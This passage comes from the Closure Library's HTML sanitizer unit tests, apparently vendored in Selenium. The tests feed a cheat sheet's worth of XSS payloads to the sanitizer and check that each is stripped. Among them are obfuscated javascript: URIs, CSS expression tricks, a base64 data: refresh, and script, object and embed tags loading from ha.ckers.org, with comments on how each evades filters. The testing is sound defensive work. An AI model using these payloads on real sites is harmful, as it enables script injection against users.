CoCalc -- htmlsanitizer

GitHub Repository: seleniumhq/selenium
Path: blob/trunk/third_party/closure/goog/html/sanitizer/htmlsanitizer_test.js
²⁸⁶⁸ views
1
// Copyright 2016 The Closure Library Authors. All Rights Reserved.
2
//
3
// Licensed under the Apache License, Version 2.0 (the "License");
4
// you may not use this file except in compliance with the License.
5
// You may obtain a copy of the License at
6
//
7
//      http://www.apache.org/licenses/LICENSE-2.0
8
//
9
// Unless required by applicable law or agreed to in writing, software
10
// distributed under the License is distributed on an "AS-IS" BASIS,
11
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12
// See the License for the specific language governing permissions and
13
// limitations under the License.
14

15

16
/**
17
 * @fileoverview Unit tests for HTML Sanitizer
18
 */
19

20
goog.setTestOnly();
21

22
goog.require('goog.array');
23
goog.require('goog.dom');
24
goog.require('goog.html.SafeHtml');
25
goog.require('goog.html.SafeUrl');
26
goog.require('goog.html.sanitizer.HtmlSanitizer');
27
goog.require('goog.html.sanitizer.HtmlSanitizer.Builder');
28
goog.require('goog.html.sanitizer.TagWhitelist');
29
goog.require('goog.html.sanitizer.unsafe');
30
goog.require('goog.html.testing');
31
goog.require('goog.object');
32
goog.require('goog.string.Const');
33
goog.require('goog.testing.dom');
34
goog.require('goog.testing.jsunit');
35
goog.require('goog.userAgent');
36

37

38
/**
39
 * @return {boolean} Whether the browser is IE8 or below.
40
 */
41
function isIE8() {
42
  return goog.userAgent.IE && !goog.userAgent.isVersionOrHigher(9);
43
}
44

45

46
/**
47
 * @return {boolean} Whether the browser is IE9.
48
 */
49
function isIE9() {
50
  return goog.userAgent.IE && !goog.userAgent.isVersionOrHigher(10) && !isIE8();
51
}
52

53

54
/**
55
 * Sanitizes the original HTML and asserts that it is the same as the expected
56
 * HTML. If present the config is passed through to the sanitizer.
57
 * @param {string} originalHtml
58
 * @param {string} expectedHtml
59
 * @param {?goog.html.sanitizer.HtmlSanitizer=} opt_sanitizer
60
 */
61
function assertSanitizedHtml(originalHtml, expectedHtml, opt_sanitizer) {
62
  var sanitizer =
63
      opt_sanitizer || new goog.html.sanitizer.HtmlSanitizer.Builder().build();
64
  try {
65
    var sanitized = sanitizer.sanitize(originalHtml);
66
    if (isIE9()) {
67
      assertEquals('', goog.html.SafeHtml.unwrap(sanitized));
68
      return;
69
    }
70
    goog.testing.dom.assertHtmlMatches(
71
        expectedHtml, goog.html.SafeHtml.unwrap(sanitized),
72
        true /* opt_strictAttributes */);
73
  } catch (err) {
74
    if (!isIE8()) {
75
      throw err;
76
    }
77
  }
78
  if (!opt_sanitizer) {
79
    // Retry with raw sanitizer created without the builder.
80
    assertSanitizedHtml(
81
        originalHtml, expectedHtml, new goog.html.sanitizer.HtmlSanitizer());
82
    // Retry with an explicitly passed in Builder.
83
    var builder = new goog.html.sanitizer.HtmlSanitizer.Builder();
84
    assertSanitizedHtml(
85
        originalHtml, expectedHtml,
86
        new goog.html.sanitizer.HtmlSanitizer(builder));
87
  }
88
}
89

90

91
/**
92
 * @param {!goog.html.SafeHtml} safeHtml Sanitized HTML which contains a style.
93
 * @return {string} cssText contained within SafeHtml.
94
 */
95
function getStyle(safeHtml) {
96
  var tmpElement = goog.dom.safeHtmlToNode(safeHtml);
97
  return tmpElement.style ? tmpElement.style.cssText : '';
98
}
99

100

101
function testHtmlSanitizeSafeHtml() {
102
  var html;
103
  html = 'hello world';
104
  assertSanitizedHtml(html, html);
105

106
  html = '<b>hello world</b>';
107
  assertSanitizedHtml(html, html);
108

109
  html = '<i>hello world</i>';
110
  assertSanitizedHtml(html, html);
111

112
  html = '<u>hello world</u>';
113
  assertSanitizedHtml(html, html);
114

115
  // NOTE(user): original did not have tbody
116
  html = '<table><tbody><tr><td>hello world</td></tr></tbody></table>';
117
  assertSanitizedHtml(html, html);
118

119
  html = '<h1>hello world</h1>';
120
  assertSanitizedHtml(html, html);
121

122
  html = '<div>hello world</div>';
123
  assertSanitizedHtml(html, html);
124

125
  html = '<a>hello world</a>';
126
  assertSanitizedHtml(html, html);
127

128
  html = '<div><span>hello world</span></div>';
129
  assertSanitizedHtml(html, html);
130

131
  html = '<div><a target=\'_blank\'>hello world</a></div>';
132
  assertSanitizedHtml(html, html);
133
}
134

135

136
// TODO(pelizzi): name of test does not make sense
137
function testDefaultCssSanitizeImage() {
138
  var html = '<div></div>';
139
  assertSanitizedHtml(html, html);
140
}
141

142

143
function testBuilderCanOnlyBeUsedOnce() {
144
  var builder = new goog.html.sanitizer.HtmlSanitizer.Builder();
145
  var sanitizer = builder.build();
146
  assertThrows(function() {
147
    builder.build();
148
  });
149
  assertThrows(function() {
150
    new goog.html.sanitizer.HtmlSanitizer(builder);
151
  });
152
}
153

154

155
function testAllowedCssSanitizeImage() {
156
  var testUrl = 'http://www.example.com/image3.jpg';
157
  var html = '<div style="background: url(' + testUrl + ');"></div>';
158

159
  var sanitizer =
160
      new goog.html.sanitizer.HtmlSanitizer.Builder()
161
          .allowCssStyles()
162
          .withCustomNetworkRequestUrlPolicy(goog.html.SafeUrl.sanitize)
163
          .build();
164

165
  try {
166
    var sanitizedHtml = sanitizer.sanitize(html);
167
    if (isIE9()) {
168
      assertEquals('', goog.html.SafeHtml.unwrap(sanitizedHtml));
169
      return;
170
    }
171
    assertRegExp(
172
        /background(?:-image)?:.*url\(.?http:\/\/www.example.com\/image3.jpg.?\)/,
173
        getStyle(sanitizedHtml));
174
  } catch (err) {
175
    if (!isIE8()) {
176
      throw err;
177
    }
178
  }
179
}
180

181

182
function testHtmlSanitizeXSS() {
183
  // NOTE(user): xss cheat sheet found on http://ha.ckers.org/xss.html
184
  var safeHtml, xssHtml;
185
  // Inserting <script> tags is unsafe
186
  // Browser Support [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
187
  safeHtml = '';
188
  xssHtml = '<SCRIPT SRC=xss.js><\/SCRIPT>';
189
  assertSanitizedHtml(xssHtml, safeHtml);
190
  // removes strings like javascript:, alert, etc
191
  // Image XSS using the javascript directive
192
  // Browser Support [IE6.0|IE8.0|NS8.1-IE]
193
  safeHtml = '<img />';
194
  xssHtml = '<IMG SRC="javascript:xss=true;">';
195
  assertSanitizedHtml(xssHtml, safeHtml);
196

197
  safeHtml = '<div><a>hello world</a></div>';
198
  xssHtml = '<div><a target=\'_xss\'>hello world</a></div>';
199
  assertSanitizedHtml(xssHtml, safeHtml);
200

201
  safeHtml = '';
202
  xssHtml = '<IFRAME SRC="javascript:xss=true;">';
203
  assertSanitizedHtml(xssHtml, safeHtml);
204

205
  safeHtml = '';
206
  xssHtml = '<iframe src=" javascript:xss=true;">';
207
  assertSanitizedHtml(xssHtml, safeHtml);
208

209
  // no quotes and no semicolon
210
  // Browser Support [IE6.0|NS8.1-IE]
211
  safeHtml = '<img />';
212
  xssHtml = '<IMG SRC=javascript:alert("XSS")>';
213
  assertSanitizedHtml(xssHtml, safeHtml);
214

215
  // case insensitive xss attack
216
  // Browser Support [IE6.0|NS8.1-IE]
217
  safeHtml = '<img />';
218
  xssHtml = '<IMG SRC=JaVaScRiPt:alert("XSS")>';
219
  assertSanitizedHtml(xssHtml, safeHtml);
220

221
  // HTML Entities
222
  // Browser Support [IE6.0|NS8.1-IE]
223
  safeHtml = '<img />';
224
  xssHtml = '<IMG SRC=javascript:alert(&quot;XSS&quot;)>';
225
  assertSanitizedHtml(xssHtml, safeHtml);
226

227
  // Grave accent obfuscation (If you need to use both double and single quotes
228
  // you can use a grave accent to encapsulate the JavaScript string)
229
  // Browser Support [IE6.0|NS8.1-IE]
230
  safeHtml = '<img />';
231
  xssHtml = '<IMG SRC=`javascript:alert("foo \'bar\'")`>';
232
  assertSanitizedHtml(xssHtml, safeHtml);
233

234
  safeHtml = '<img />';
235
  xssHtml = '<IMG data-xxx=`yyy`>';
236
  assertSanitizedHtml(xssHtml, safeHtml);
237

238
  // Malformed IMG tags
239
  // http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300
240
  // Browser Support [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
241
  safeHtml = '<img />"&gt;';
242
  xssHtml = '<IMG """><SCRIPT defer>exploited = true;<\/SCRIPT>">';
243
  assertSanitizedHtml(xssHtml, safeHtml);
244

245
  // UTF-8 Unicode encoding
246
  // Browser Support [IE6.0|NS8.1-IE]
247
  safeHtml = '<img />';
248
  xssHtml = '<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;' +
249
      '&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;' +
250
      '&#41;>';
251
  assertSanitizedHtml(xssHtml, safeHtml);
252

253
  // Long UTF-8 Unicode encoding without semicolons (this is often effective
254
  // in XSS that attempts to look for "&#XX;", since most people don't know
255
  // about padding - up to 7 numeric characters total). This is also useful
256
  // against people who decode against strings like
257
  // $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon
258
  // is required to terminate a html encoded string:
259
  // Browser Support [IE6.0|NS8.1-IE]
260
  safeHtml = '<img />';
261
  xssHtml = '<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099' +
262
      '&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108' +
263
      '&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083' +
264
      '&#0000083&#0000039&#0000041>';
265
  assertSanitizedHtml(xssHtml, safeHtml);
266

267
  // Hex encoding without semicolons (this is also a viable XSS attack against
268
  // the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that
269
  // there is a numeric character following the pound symbol - which is not true
270
  // with hex HTML characters). Use the XSS calculator for more information:
271
  // Browser Support [IE6.0|NS8.1-IE]
272
  safeHtml = '<img />';
273
  xssHtml = '<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A' +
274
      '&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>';
275
  assertSanitizedHtml(xssHtml, safeHtml);
276

277
  // Embedded tab
278
  // Browser Support [IE6.0|NS8.1-IE]
279
  safeHtml = '<img />';
280
  xssHtml = '<IMG SRC="jav\tascript:xss=true;">';
281
  assertSanitizedHtml(xssHtml, safeHtml);
282

283
  // Embedded encoded tab
284
  // Browser Support [IE6.0|NS8.1-IE]
285
  safeHtml = '<img />';
286
  xssHtml = '<IMG SRC="jav&#x09;ascript:xss=true;">';
287
  assertSanitizedHtml(xssHtml, safeHtml);
288

289
  // Embeded newline to break up XSS. Some websites claim that any of the chars
290
  // 09-13 (decimal) will work for this attack. That is incorrect. Only 09
291
  // (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii
292
  // chart for more details. The following four XSS examples illustrate this
293
  // vector:
294
  // Browser Support [IE6.0|NS8.1-IE]
295
  safeHtml = '<img />';
296
  xssHtml = '<IMG SRC="jav&#x0A;ascript:xss=true;">';
297
  assertSanitizedHtml(xssHtml, safeHtml);
298

299
  // Multiline Injected JavaScript using ASCII carriage returns (same as above
300
  // only a more extreme example of this XSS vector) these are not spaces just
301
  // one of the three characters as described above:
302
  // Browser Support [IE6.0|NS8.1-IE]
303
  safeHtml = '<img />';
304
  xssHtml = '<IMG\nSRC\n=\n"\nj\na\nv\na\ns\nc\nr\ni\np\nt\n:\na\nl\ne\nr\nt' +
305
      '\n(\n"\nX\nS\nS\n"\n)\n"\n>';
306
  assertSanitizedHtml(xssHtml, safeHtml);
307

308
  // Null breaks up JavaScript directive. Okay, I lied, null chars also work as
309
  // XSS vectors but not like above, you need to inject them directly using
310
  // something like Burp Proxy or use %00 in the URL string or if you want to
311
  // write your own injection tool you can either use vim (^V^@ will produce a
312
  // null) or the following program to generate it into a text file. Okay, I
313
  // lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable
314
  // to one additional char 173 (the soft hypen control char). But the null
315
  // char %00 is much more useful and helped me bypass certain real world
316
  // filters with a variation on this example:
317
  // Browser Support [IE6.0|IE7.0|NS8.1-IE]
318
  safeHtml = '<img />';
319
  xssHtml = '<IMG SRC=java\0script:alert("hey");>';
320
  assertSanitizedHtml(xssHtml, safeHtml);
321

322
  // On IE9, the null character actually causes us to only see <SCR. The
323
  // sanitizer on IE9 doesn't "recover as well" as other browsers but the
324
  // result is safe.
325
  safeHtml = isIE9() ? '' : '<span>alert("XSS")</span>';
326
  xssHtml = '<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>';
327
  assertSanitizedHtml(xssHtml, safeHtml);
328

329
  // Spaces and meta chars before the JavaScript in images for XSS (this is
330
  // useful if the pattern match doesn't take into account spaces in the word
331
  // "javascript:" -which is correct since that won't render- and makes the
332
  // false assumption that you can't have a space between the quote and the
333
  // "javascript:" keyword. The actual reality is you can have any char from
334
  // 1-32 in decimal):
335
  // Browser Support [IE7.0|NS8.1-IE]
336
  safeHtml = '<img />';
337
  xssHtml = '<IMG SRC=" &#14;  javascript:alert(window);">';
338
  assertSanitizedHtml(xssHtml, safeHtml);
339

340
  // Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I
341
  // found that it assumes a non-alpha-non-digit is not valid after an HTML
342
  // keyword and therefor considers it to be a whitespace or non-valid token
343
  // after an HTML tag. The problem is that some XSS filters assume that the
344
  // tag they are looking for is broken up by whitespace.
345
  // Browser Support [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
346
  safeHtml = '';
347
  xssHtml = '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"><\/SCRIPT>';
348
  assertSanitizedHtml(xssHtml, safeHtml);
349

350
  // Non-alpha-non-digit part 2 XSS. yawnmoth brought my attention to this
351
  // vector, based on the same idea as above, however, I expanded on it, using
352
  // my fuzzer. The Gecko rendering engine allows for any character other than
353
  // letters, numbers or encapsulation chars (like quotes, angle brackets,
354
  // etc...) between the event handler and the equals sign, making it easier
355
  // to bypass cross site scripting blocks. Note that this also applies to the
356
  // grave accent char as seen here:
357
  // Browser support: [NS8.1-G|FF2.0]
358
  safeHtml = '';
359
  xssHtml = '<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>';
360
  assertSanitizedHtml(xssHtml, safeHtml);
361

362
  // Non-alpha-non-digit part 3 XSS. Yair Amit brought this to my attention
363
  // that there is slightly different behavior between the IE and Gecko
364
  // rendering engines that allows just a slash between the tag and the
365
  // parameter with no spaces. This could be useful if the system does not
366
  // allow spaces.
367
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
368
  safeHtml = '';
369
  xssHtml = '<SCRIPT/SRC="http://ha.ckers.org/xss.js"><\/SCRIPT>';
370
  assertSanitizedHtml(xssHtml, safeHtml);
371

372
  // Extraneous open brackets. Submitted by Franz Sedlmaier, this XSS vector
373
  // could defeat certain detection engines that work by first using matching
374
  // pairs of open and close angle brackets and then by doing a comparison of
375
  // the tag inside, instead of a more efficient algorythm like Boyer-Moore that
376
  // looks for entire string matches of the open angle bracket and associated
377
  // tag (post de-obfuscation, of course). The double slash comments out the
378
  // ending extraneous bracket to supress a JavaScript error:
379
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
380
  safeHtml = '&lt;';
381
  xssHtml = '<<SCRIPT>xss=true;//<<\/SCRIPT>';
382
  assertSanitizedHtml(xssHtml, safeHtml);
383

384
  // No closing script tags. In Firefox and Netscape 8.1 in the Gecko rendering
385
  // engine mode you don't actually need the "><\/SCRIPT>" portion of this Cross
386
  // Site Scripting vector. Firefox assumes it's safe to close the HTML tag and
387
  // add closing tags for you. How thoughtful! Unlike the next one, which
388
  // doesn't effect Firefox, this does not require any additional HTML below it.
389
  // You can add quotes if you need to, but they're not needed generally,
390
  // although beware, I have no idea what the HTML will end up looking like once
391
  // this is injected:
392
  // Browser support: [NS8.1-G|FF2.0]
393
  safeHtml = '';
394
  xssHtml = '<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>';
395
  assertSanitizedHtml(xssHtml, safeHtml);
396

397
  // Protocol resolution in script tags. This particular variant was submitted
398
  // by Lukasz Pilorz and was based partially off of Ozh's protocol resolution
399
  // bypass below. This cross site scripting example works in IE, Netscape in
400
  // IE rendering mode and Opera if you add in a <\/SCRIPT> tag at the end.
401
  // However, this is especially useful where space is an issue, and of course,
402
  // the shorter your domain, the better. The ".j" is valid, regardless of the
403
  // encoding type because the browser knows it in context of a SCRIPT tag.
404
  // Browser support: [NS8.1-G|FF2.0]
405
  safeHtml = '';
406
  xssHtml = '<SCRIPT SRC=//ha.ckers.org/.j>';
407
  assertSanitizedHtml(xssHtml, safeHtml);
408

409
  // Half open HTML/JavaScript XSS vector. Unlike Firefox the IE rendering
410
  // engine doesn't add extra data to your page, but it does allow the
411
  // javascript: directive in images. This is useful as a vector because it
412
  // doesn't require a close angle bracket. This assumes there is any HTML tag
413
  // below where you are injecting this cross site scripting vector. Even though
414
  // there is no close ">" tag the tags below it will close it. A note: this
415
  // does mess up the HTML, depending on what HTML is beneath it. It gets around
416
  // the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/
417
  // because it doesn't require the end ">". As a side note, this was also
418
  // affective against a real world XSS filter I came across using an open
419
  // ended <IFRAME tag instead of an <IMG tag:
420
  // Browser support: [IE6.0|NS8.1-IE]
421
  safeHtml = isIE9() ? '<img>' : '';
422
  xssHtml = '<IMG SRC="javascript:alert(this)"';
423
  assertSanitizedHtml(xssHtml, safeHtml);
424

425
  // Double open angle brackets. This is an odd one that Steven Christey
426
  // brought to my attention. At first I misclassified this as the same XSS
427
  // vector as above but it's surprisingly different. Using an open angle
428
  // bracket at the end of the vector instead of a close angle bracket causes
429
  // different behavior in Netscape Gecko rendering. Without it, Firefox will
430
  // work but Netscape won't:
431
  // Browser support: [NS8.1-G|FF2.0]
432
  safeHtml = '';
433
  xssHtml = '<iframe src=http://ha.ckers.org/scriptlet.html <';
434
  assertSanitizedHtml(xssHtml, safeHtml);
435

436
  // End title tag. This is a simple XSS vector that closes <TITLE> tags,
437
  // which can encapsulate the malicious cross site scripting attack:
438
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
439
  safeHtml = '';
440
  xssHtml = '</TITLE><SCRIPT>alert(window);<\/SCRIPT>';
441
  assertSanitizedHtml(xssHtml, safeHtml);
442

443
  // Input Image.
444
  // Browser support: [IE6.0|NS8.1-IE]
445
  safeHtml = '<input type="IMAGE" />';
446
  xssHtml = '<INPUT TYPE="IMAGE" SRC="javascript:alert(window);">';
447
  assertSanitizedHtml(xssHtml, safeHtml);
448

449
  // Body image.
450
  // Browser support: [IE6.0|NS8.1-IE]
451
  safeHtml = '';
452
  xssHtml = '<BODY BACKGROUND="javascript:alert(window)">';
453
  assertSanitizedHtml(xssHtml, safeHtml);
454

455
  // BODY tag (I like this method because it doesn't require using any variants
456
  // of "javascript:" or "<SCRIPT..." to accomplish the XSS attack).
457
  // Dan Crowley additionally noted that you can put a space before the equals
458
  // sign ("onload=" != "onload ="):
459
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
460
  safeHtml = '';
461
  xssHtml = '<BODY ONLOAD=alert(window)>';
462
  assertSanitizedHtml(xssHtml, safeHtml);
463

464
  // IMG SYNSRC.
465
  // Browser support: [IE6.0|NS8.1-IE]
466
  safeHtml = '<img />';
467
  xssHtml = '<IMG DYNSRC="javascript:alert(window)">';
468
  assertSanitizedHtml(xssHtml, safeHtml);
469

470
  // IMG LOWSRC.
471
  // Browser support: [IE6.0|NS8.1-IE]
472
  safeHtml = '<img />';
473
  xssHtml = '<IMG LOWSRC="javascript:alert(window)">';
474
  assertSanitizedHtml(xssHtml, safeHtml);
475

476
  // BGSOUND
477
  safeHtml = '';
478
  xssHtml = '<BGSOUND SRC="javascript:alert(window);">';
479
  assertSanitizedHtml(xssHtml, safeHtml);
480

481
  // & Javascript includes
482
  // Browser support: netscape 4
483
  safeHtml = '<br size="&amp;{alert(window)}" />';
484
  xssHtml = '<BR SIZE="&{alert(window)}">';
485
  assertSanitizedHtml(xssHtml, safeHtml);
486

487
  // Layer
488
  // Browser support: netscape 4
489
  safeHtml = '';
490
  xssHtml = '<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>';
491
  assertSanitizedHtml(xssHtml, safeHtml);
492

493
  // STYLE sheet
494
  // Browser support: [IE6.0|NS8.1-IE]
495
  safeHtml = '';
496
  xssHtml = '<LINK REL="stylesheet" HREF="javascript:alert(window);">';
497
  assertSanitizedHtml(xssHtml, safeHtml);
498

499
  // List-style-image. Fairly esoteric issue dealing with embedding images for
500
  // bulleted lists. This will only work in the IE rendering engine because of
501
  // the JavaScript directive. Not a particularly useful cross site scripting
502
  // vector:
503
  // Browser support: [IE6.0|NS8.1-IE]
504
  safeHtml = '<ul><li>XSS</li></ul>';
505
  xssHtml = '<STYLE>li {list-style-image: url("javascript:alert(window)");}' +
506
      '</STYLE><UL><LI>XSS';
507
  assertSanitizedHtml(xssHtml, safeHtml);
508

509
  // VBscript in an image:
510
  // Browser support: [IE6.0|NS8.1-IE]
511
  safeHtml = '<img />';
512
  xssHtml = '<IMG SRC=\'vbscript:msgbox("XSS")\'>';
513
  assertSanitizedHtml(xssHtml, safeHtml);
514

515
  // Mock in an image:
516
  // Browser support: [NS4]
517
  safeHtml = '<img />';
518
  xssHtml = '<IMG SRC="mocha:[code]">';
519
  assertSanitizedHtml(xssHtml, safeHtml);
520

521
  // Livescript in an image:
522
  // Browser support: [NS4]
523
  safeHtml = '<img />';
524
  xssHtml = '<IMG SRC="livescript:[code]">';
525
  assertSanitizedHtml(xssHtml, safeHtml);
526

527
  // META (the odd thing about meta refresh is that it doesn't send a referrer
528
  // in the header - so it can be used for certain types of attacks where you
529
  // need to get rid of referring URLs):
530
  // Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
531
  safeHtml = '';
532
  xssHtml = '<META HTTP-EQUIV="refresh" CONTENT="0;url=' +
533
      'javascript:alert(window);">';
534
  assertSanitizedHtml(xssHtml, safeHtml);
535

536
  // META using data: directive URL scheme. This is nice because it also doesnt
537
  // have anything visibly that has the word SCRIPT or the JavaScript directive
538
  // in it, because it utilizes base64 encoding. Please see RFC 2397 for more
539
  // details or go here or here to encode your own. You can also use the XSS
540
  // calculator below if you just want to encode raw HTML or JavaScript as it
541
  // has a Base64 encoding method:
542
  // Browser support: [NS8.1-G|FF2.0] [O9.02]
543
  safeHtml = '';
544
  xssHtml = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,' +
545
      'PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">';
546
  assertSanitizedHtml(xssHtml, safeHtml);
547

548
  // META with additional URL parameter. If the target website attempts to see
549
  // if the URL contains "http://" at the beginning you can evade it with the
550
  // following technique (Submitted by Moritz Naumann):
551
  safeHtml = '';
552
  xssHtml = '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=' +
553
      'javascript:alert(window);">';
554
  assertSanitizedHtml(xssHtml, safeHtml);
555

556
  // IFRAME (if iframes are allowed there are a lot of other XSS problems as
557
  // well):
558
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
559
  safeHtml = '';
560
  xssHtml = '<IFRAME SRC="javascript:alert(window);"></IFRAME>';
561
  assertSanitizedHtml(xssHtml, safeHtml);
562

563
  // FRAME (frames have the same sorts of XSS problems as iframes):
564
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
565
  safeHtml = '';
566
  xssHtml = '<FRAMESET><FRAME SRC="javascript:alert(window);"></FRAMESET>';
567
  assertSanitizedHtml(xssHtml, safeHtml);
568

569
  // TABLE (who would have thought tables were XSS targets... except me, of
570
  // course):
571
  // Browser support: [IE6.0|NS8.1-IE] [O9.02]
572
  safeHtml = isIE9() ? '<table><div></div></table>' : '<table></table>';
573
  xssHtml = '<TABLE BACKGROUND="javascript:alert(window)">';
574
  // TODO(danesh): Investigate why this is different for IE9.
575
  assertSanitizedHtml(xssHtml, safeHtml);
576

577
  // TD (just like above, TD's are vulnerable to BACKGROUNDs containing
578
  // JavaScript XSS vectors):
579
  // Browser support: [IE6.0|NS8.1-IE] [O9.02]
580
  // NOTE(user): original lacked tbody tags
581
  safeHtml = '<table><tbody><tr><td></td></tr></tbody></table>';
582
  xssHtml = '<TABLE><TD BACKGROUND="javascript:alert(window)">';
583
  assertSanitizedHtml(xssHtml, safeHtml);
584

585
  // TD (just like above, TD's are vulnerable to BACKGROUNDs containing
586
  // JavaScript XSS vectors):
587
  // Browser support: [IE6.0|NS8.1-IE] [O9.02]
588
  safeHtml = '<div></div>';
589
  xssHtml = '<DIV STYLE="background-image: url(javascript:alert(window))">';
590
  assertSanitizedHtml(xssHtml, safeHtml);
591

592
  // DIV background-image plus extra characters. I built a quick XSS fuzzer to
593
  // detect any erroneous characters that are allowed after the open parenthesis
594
  // but before the JavaScript directive in IE and Netscape 8.1 in secure site
595
  // mode. These are in decimal but you can include hex and add padding of
596
  // course. (Any of the following chars can be used: 1-32, 34, 39, 160,
597
  // 8192-8.13, 12288, 65279):
598
  // Browser support: [IE6.0|NS8.1-IE]
599
  safeHtml = '<div></div>';
600
  xssHtml = '<DIV STYLE="background-image: url(&#1;javascript:alert(window))">';
601
  assertSanitizedHtml(xssHtml, safeHtml);
602

603
  // DIV expression - a variant of this was effective against a real world
604
  // cross site scripting filter using a newline between the colon and
605
  // "expression":
606
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
607
  safeHtml = '<div></div>';
608
  xssHtml = '<DIV STYLE="width: expression(alert(window));">';
609
  assertSanitizedHtml(xssHtml, safeHtml);
610

611
  // STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE
612
  // into an infinite loop of alerts):
613
  // Browser support: [IE6.0|NS8.1-IE]
614
  safeHtml = '';
615
  xssHtml = '<STYLE>@im\port\'\ja\vasc\ript:alert(window)\';</STYLE>';
616
  assertSanitizedHtml(xssHtml, safeHtml);
617

618
  // STYLE attribute using a comment to break up expression (Thanks to Roman
619
  // Ivanov for this one):
620
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
621
  safeHtml = '<img />';
622
  xssHtml = '<IMG STYLE="xss:expr/*XSS*/ession(alert(window))">';
623
  assertSanitizedHtml(xssHtml, safeHtml);
624

625
  // Anonymous HTML with STYLE attribute (IE6.0 and Netscape 8.1+ in IE
626
  // rendering engine mode don't really care if the HTML tag you build exists
627
  // or not, as long as it starts with an open angle bracket and a letter):
628
  safeHtml = '<span></span>';
629
  xssHtml = '<XSS STYLE="xss:expression(alert(window))">';
630
  assertSanitizedHtml(xssHtml, safeHtml);
631

632
  // IMG STYLE with expression (this is really a hybrid of the above XSS
633
  // vectors, but it really does show how hard STYLE tags can be to parse apart,
634
  // like above this can send IE into a loop):
635
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
636
  safeHtml = isIE9() ? 'undefined' : 'exp/*<a></a>';
637
  xssHtml = 'exp/*<A STYLE="no\\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*' +
638
      '/*/pression(alert(window))">';
639
  assertSanitizedHtml(xssHtml, safeHtml);
640

641
  // STYLE tag (Older versions of Netscape only):
642
  // Browser support: [NS4]
643
  safeHtml = '';
644
  xssHtml = '<STYLE TYPE="text/javascript">xss=true;</STYLE>';
645
  assertSanitizedHtml(xssHtml, safeHtml);
646

647
  // STYLE tag using background-image:
648
  // Browser support: [IE6.0|NS8.1-IE]
649
  safeHtml = isIE9() ? 'undefined' : '<a></a>';
650
  xssHtml = '<STYLE>.XSS{background-image:url("javascript:alert("XSS")");}' +
651
      '</STYLE><A CLASS=XSS></A>';
652
  assertSanitizedHtml(xssHtml, safeHtml);
653

654
  // BASE tag. Works in IE and Netscape 8.1 in safe mode. You need the // to
655
  // comment out the next characters so you won't get a JavaScript error and
656
  // your XSS tag will render. Also, this relies on the fact that the website
657
  // uses dynamically placed images like "images/image.jpg" rather than full
658
  // paths. If the path includes a leading forward slash like
659
  // "/images/image.jpg" you can remove one slash from this vector (as long as
660
  // there are two to begin the comment this will work):
661
  // Browser support: [IE6.0|NS8.1-IE]
662
  safeHtml = '';
663
  xssHtml = '<BASE HREF="javascript:xss=true;//">';
664
  assertSanitizedHtml(xssHtml, safeHtml);
665

666
  // OBJECT tag (if they allow objects, you can also inject virus payloads to
667
  // infect the users, etc. and same with the APPLET tag). The linked file is
668
  // actually an HTML file that can contain your XSS:
669
  // Browser support: [O9.02]
670
  safeHtml = '';
671
  xssHtml = '<OBJECT TYPE="text/x-scriptlet" ' +
672
      'DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>';
673
  assertSanitizedHtml(xssHtml, safeHtml);
674

675
  // Using an EMBED tag you can embed a Flash movie that contains XSS. Click
676
  // here for a demo. If you add the attributes allowScriptAccess="never" and
677
  // allownetworking="internal" it can mitigate this risk (thank you to Jonathan
678
  // Vanasco for the info).:
679
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
680
  safeHtml = '';
681
  xssHtml = '<EMBED SRC="http://ha.ckers.org/xss.swf" ' +
682
      'AllowScriptAccess="always"></EMBED>';
683
  assertSanitizedHtml(xssHtml, safeHtml);
684

685
  // You can EMBED SVG which can contain your XSS vector. This example only
686
  // works in Firefox, but it's better than the above vector in Firefox because
687
  // it does not require the user to have Flash turned on or installed. Thanks
688
  // to nEUrOO for this one.
689
